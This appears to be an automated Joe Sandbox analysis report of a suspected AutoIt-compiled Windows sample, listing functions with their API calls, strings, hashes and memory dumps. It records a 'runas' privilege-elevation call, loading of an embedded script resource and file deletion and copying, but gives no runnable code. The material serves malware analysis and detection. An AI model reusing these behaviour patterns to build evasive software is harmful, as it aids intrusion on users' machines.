API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O$
API String ID: 3290436268-1104098451
Opcode ID: e806f9d53c5c439267a830f29448208411e1c1b60c82f40fe9e11e097dab28c2
Instruction ID: 014472afd6f5e6ff4377a10c2bd0deb70874275ce4d5adb5d00a3d229cf57553
Opcode Fuzzy Hash: e806f9d53c5c439267a830f29448208411e1c1b60c82f40fe9e11e097dab28c2
Instruction Fuzzy Hash: 64A1937595A2C4DFC711D76978817ED7FECBB26B00B0D48E9D88193B32D6604A0ACB29

Function 00BB42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00BB50AA,?,?,00000000,00000000), ref: 00BB42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BB50AA,?,?,00000000,00000000), ref: 00BB42C9
LoadResource.KERNEL32(?,00000000,?,?,00BB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BB4F20), ref: 00BF35BE
SizeofResource.KERNEL32(?,00000000,?,?,00BB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BB4F20), ref: 00BF35D3
LockResource.KERNEL32(00BB50AA,?,?,00BB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BB4F20,?), ref: 00BF35E6

Strings

SCRIPT, xrefs: 00BB42BF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: a928c6d0843b5f41ae531e9d822a965fa2f113d2e7f292cdd6cd6d406b438731
Instruction ID: 8b7d913815fe0054f02fda63ed0ccacf1528cb8c14afcbd70364f65001d55132
Opcode Fuzzy Hash: a928c6d0843b5f41ae531e9d822a965fa2f113d2e7f292cdd6cd6d406b438731
Instruction Fuzzy Hash: 22117C74201700BFEB258FA5DC89F6B7BB9FBC6B51F1081A9B412962A0DBB1D8049620

Function 00BF2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00BB2B6B

Part of subcall function 00BB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C81418,?,00BB2E7F,?,?,?,00000000), ref: 00BB3A78

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00C72224), ref: 00BF2C10
ShellExecuteW.SHELL32(00000000,?,?,00C72224), ref: 00BF2C17

Strings

runas, xrefs: 00BF2C0B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: d0c38e48478d120dc92e4378f2b246e9792c32c54e237c036c855973163f2aa1
Instruction ID: 134d3d666d36ceea01e9de6bd756618de802d05d7477bb21ce87ef86232309df
Opcode Fuzzy Hash: d0c38e48478d120dc92e4378f2b246e9792c32c54e237c036c855973163f2aa1
Instruction Fuzzy Hash: 0611B4312083456BC714FF60D891AFE7BE8AB91750F4854ADF546130A3CFE1894A8712

Function 00C1DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00BF5222), ref: 00C1DBCE
GetFileAttributesW.KERNELBASE(?), ref: 00C1DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 00C1DBEE
FindClose.KERNEL32(00000000), ref: 00C1DBFA

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: edbbf6364964bf7df6268bf5126befe00761c5afe957379ab4376c4ffc10dfd3
Instruction ID: 48f6878c8d7fef67e64a214214fe3a0abb1f5c80af97422ee09e206a3d42953c
Opcode Fuzzy Hash: edbbf6364964bf7df6268bf5126befe00761c5afe957379ab4376c4ffc10dfd3
Instruction Fuzzy Hash: CCF0A0388119105783306B78AC4DAEE377CAE03334B104B02F936C20F0EBF09A94D6D5

Function 00BBD730 Relevance: 21.6, APIs: 14, Instructions: 621windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00BBD807
timeGetTime.WINMM ref: 00BBDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BBDB28
TranslateMessage.USER32(?), ref: 00BBDB7B
DispatchMessageW.USER32(?), ref: 00BBDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BBDB9F
Sleep.KERNEL32(0000000A), ref: 00BBDBB1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 9d9979b26d8c983a9047e633fe003c596d32d3bdb520e40e035c87fffab89ba1
Instruction ID: d202acbf9c01ef28899dbbe57add126e38cb6a0f3128f977a016d4e8868b2515
Opcode Fuzzy Hash: 9d9979b26d8c983a9047e633fe003c596d32d3bdb520e40e035c87fffab89ba1
Instruction Fuzzy Hash: F442D430608241DFD729CF24C888BBAB7E4FF45314F58469DE9A687291E7B4E944DB82

Function 00BB2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB2D07
RegisterClassExW.USER32(00000030), ref: 00BB2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB2D42
InitCommonControlsEx.COMCTL32(?), ref: 00BB2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB2D6F
LoadIconW.USER32(000000A9), ref: 00BB2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB2D94

Strings

0, xrefs: 00BB2CE9
AutoIt v3 GUI, xrefs: 00BB2D23
TaskbarCreated, xrefs: 00BB2D37
+, xrefs: 00BB2CF0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 865a63ea4186848ed1b11b1436cd8316b6cc9667b51c0b489f4e4517296f4bf2
Instruction ID: 5e32f6961f4a61667f8db52fe930ba847a4dea8bafccbd7e5fd45423743c8a7b
Opcode Fuzzy Hash: 865a63ea4186848ed1b11b1436cd8316b6cc9667b51c0b489f4e4517296f4bf2
Instruction Fuzzy Hash: F321C2B5912318AFDB40DFA4EC89BDDBBF8FB09700F04811AF911A62A0D7B15545CF95

Function 00BF065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BF039A: CreateFileW.KERNELBASE(00000000,00000000,?,00BF0704,?,?,00000000,?,00BF0704,00000000,0000000C), ref: 00BF03B7

GetLastError.KERNEL32 ref: 00BF076F
__dosmaperr.LIBCMT ref: 00BF0776
GetFileType.KERNELBASE(00000000), ref: 00BF0782
GetLastError.KERNEL32 ref: 00BF078C
__dosmaperr.LIBCMT ref: 00BF0795
CloseHandle.KERNEL32(00000000), ref: 00BF07B5
CloseHandle.KERNEL32(?), ref: 00BF08FF
GetLastError.KERNEL32 ref: 00BF0931
__dosmaperr.LIBCMT ref: 00BF0938

Strings

H, xrefs: 00BF08BD

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: bc2d95566a750177b6250a2662818e9290fc7ef58e067cf3f397c6bae8d45162
Instruction ID: 35cb05d141bf184cbd41217ee4c2b6a54b3715ad5f7ef58ff3bdccd4ea4d7afe
Opcode Fuzzy Hash: bc2d95566a750177b6250a2662818e9290fc7ef58e067cf3f397c6bae8d45162
Instruction Fuzzy Hash: DCA11736A141088FDF19AF68D8917BE7BE0EB06320F144199F9159F3A2D7319D1ACB91

Function 00BB344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C81418,?,00BB2E7F,?,?,?,00000000), ref: 00BB3A78

Part of subcall function 00BB3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BB3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BB356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BF318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BF31CE
RegCloseKey.ADVAPI32(?), ref: 00BF3210
_wcslen.LIBCMT ref: 00BF3277
_wcslen.LIBCMT ref: 00BF3286

Strings

Software\AutoIt v3\AutoIt, xrefs: 00BB3560
\Include\, xrefs: 00BB3527
\, xrefs: 00BF328C
Include, xrefs: 00BF3184, 00BF31C5

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 83d2ffef63a1e5eca0452daaba8aac105258943fbe8a7dc1a22986fbaf902bf6
Instruction ID: dc4a7bef23cf977075ae48700408a741e05de2b2885b9840dd67cdac5bcf019d
Opcode Fuzzy Hash: 83d2ffef63a1e5eca0452daaba8aac105258943fbe8a7dc1a22986fbaf902bf6
Instruction Fuzzy Hash: 207199714043019FC314EF69EC96AAFBBE8FF85740B40086EF585931B0EB749A48CB66

Function 00BB2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00BB2B9D
LoadIconW.USER32(00000063), ref: 00BB2BB3
LoadIconW.USER32(000000A4), ref: 00BB2BC5
LoadIconW.USER32(000000A2), ref: 00BB2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BB2BEF
RegisterClassExW.USER32(?), ref: 00BB2C40

Part of subcall function 00BB2CD4: GetSysColorBrush.USER32(0000000F), ref: 00BB2D07
Part of subcall function 00BB2CD4: RegisterClassExW.USER32(00000030), ref: 00BB2D31
Part of subcall function 00BB2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB2D42
Part of subcall function 00BB2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00BB2D5F
Part of subcall function 00BB2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB2D6F
Part of subcall function 00BB2CD4: LoadIconW.USER32(000000A9), ref: 00BB2D85
Part of subcall function 00BB2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB2D94

Strings

#, xrefs: 00BB2C16
0, xrefs: 00BB2C0F
AutoIt v3, xrefs: 00BB2C2F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: c1a19f9e01a36ba71cb43b5cb86914a090974c3af8bdefe72fdf4d8f6e3b2253
Instruction ID: ca43dd104a87206fc90acbd284142a3d2d9000f14b0bf000f7f1516ccc587263
Opcode Fuzzy Hash: c1a19f9e01a36ba71cb43b5cb86914a090974c3af8bdefe72fdf4d8f6e3b2253
Instruction Fuzzy Hash: 8B212975E01318ABDB109FA5EC95BED7FF8FB48B50F08005AEA10A66B0D7B10541CF98

Function 00BB3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BB316A,?,?), ref: 00BB31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,00BB316A,?,?), ref: 00BB3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BB3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BB316A,?,?), ref: 00BB3232
CreatePopupMenu.USER32 ref: 00BB3246
PostQuitMessage.USER32(00000000), ref: 00BB3267

Strings

TaskbarCreated, xrefs: 00BB322D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 3329a6352dcab32bea374c7a5be206013526a6f9e1b6eaa40ea25669476728ed
Instruction ID: 88d0a50f092451faafd11787f5342207c568f98efb7e6cf5ba4ca18520fc4ea4
Opcode Fuzzy Hash: 3329a6352dcab32bea374c7a5be206013526a6f9e1b6eaa40ea25669476728ed
Instruction Fuzzy Hash: DE411535240208A7DB146B7CDC8ABFD3ADDEB06B44F0801A5F902962B1CBF19E419765

Function 00BE8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf6364c9c21896e17ef59914a7515471d6cdb380bf87bfcc7974b2e8919b8af3
Instruction ID: b61104ddae5fdf8ac971a63d77b8778d64918b083a8f2ab15a28e21e554ceb94
Opcode Fuzzy Hash: cf6364c9c21896e17ef59914a7515471d6cdb380bf87bfcc7974b2e8919b8af3
Instruction Fuzzy Hash: 6EC1E074A04289AFDB11DFAAC881BADBBF0EF09310F5441D9F919AB393C7309945CB61

Function 00FB0FE0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00FB10B1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FB12D7

Memory Dump Source

Source File: 00000001.00000002.1306941881.0000000000FAE000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FAE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fae000_6mllsKaB2q.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: d6be87f547e86566e3174f8edd7d1b61a7c7f16d8a4d60e5326ba1bea4aef5d2
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: E6A11775E00209EBDB14CFE5C8A8BEEB7B5BF48315F208159E615BB280C7759A80DF94

Function 00BB2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BB2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BB2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00BB1CAD,?), ref: 00BB2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00BB1CAD,?), ref: 00BB2CCF

Strings

edit, xrefs: 00BB2CAC
AutoIt v3, xrefs: 00BB2C89, 00BB2C8E, 00BB2C8F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 7ce1be6d3bae71aeb8701aba9774e2692a004120560dfd6e49f9945e1484b3df
Instruction ID: 7d2ebc339895ff651619bd9f21ee0fef20dab80691564dcc9bd12ac39f6aa145
Opcode Fuzzy Hash: 7ce1be6d3bae71aeb8701aba9774e2692a004120560dfd6e49f9945e1484b3df
Instruction Fuzzy Hash: 8BF0DA755413A07AEB711B17AC48FBB2EBDE7C7F50B04005AFD00A25B0C6755852DBB8

Function 00BB10F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BB1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BB1BF4
Part of subcall function 00BB1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BB1BFC
Part of subcall function 00BB1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BB1C07
Part of subcall function 00BB1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BB1C12
Part of subcall function 00BB1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BB1C1A
Part of subcall function 00BB1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BB1C22

Part of subcall function 00BB1B4A: RegisterWindowMessageW.USER32(00000004,?,00BB12C4), ref: 00BB1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BB136A
OleInitialize.OLE32 ref: 00BB1388
CloseHandle.KERNEL32(00000000,00000000), ref: 00BF24AB

Strings

h, xrefs: 00BB1292
hd, xrefs: 00BB1115

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: hd$h
API String ID: 1986988660-687906041
Opcode ID: 846f83a31cee2ca29c470592ab9c6a128b98b17a1ca863ec249d75f19acb5ab5
Instruction ID: 6db8a2a94abc12d766229304d18584e9c13e8f5c99aa6d9ea72186266f28bebc
Opcode Fuzzy Hash: 846f83a31cee2ca29c470592ab9c6a128b98b17a1ca863ec249d75f19acb5ab5
Instruction Fuzzy Hash: 7171BAB49112009FC784EF79A8567A93AE8FB8934475D856EA80AC72B2EB704402CF4C

Function 00FB0DA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FB0C90: Sleep.KERNELBASE(000001F4), ref: 00FB0CA1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FB0ED2

Strings

J43PMV0XQ6Q9DH158I, xrefs: 00FB0F35, 00FB0F38

Memory Dump Source

Source File: 00000001.00000002.1306941881.0000000000FAE000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FAE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fae000_6mllsKaB2q.jbxd

Similarity

API ID: CreateFileSleep
String ID: J43PMV0XQ6Q9DH158I
API String ID: 2694422964-2075158495
Opcode ID: 8696f6cc7a93fca4f4bf0172f89f51f9eaa1d5c95b6f318dedc490d05ac9f408
Instruction ID: 5eb0f207805b781c9f114f7de20ee974634294e4326375123af7467203c4d3e1
Opcode Fuzzy Hash: 8696f6cc7a93fca4f4bf0172f89f51f9eaa1d5c95b6f318dedc490d05ac9f408
Instruction Fuzzy Hash: CB51A131E04248DAEF11DBA4C814BEFBB78AF18300F104599E208BB2C1DBB95B45CBA5

Function 00C22947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C22C05
DeleteFileW.KERNEL32(?), ref: 00C22C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C22C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C22CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C22CC0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
